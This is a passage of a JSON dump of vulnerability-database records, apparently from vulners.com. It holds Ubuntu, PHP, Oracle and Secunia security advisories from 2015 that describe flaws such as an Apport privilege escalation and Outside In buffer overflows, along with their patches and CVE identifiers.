"CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}]}
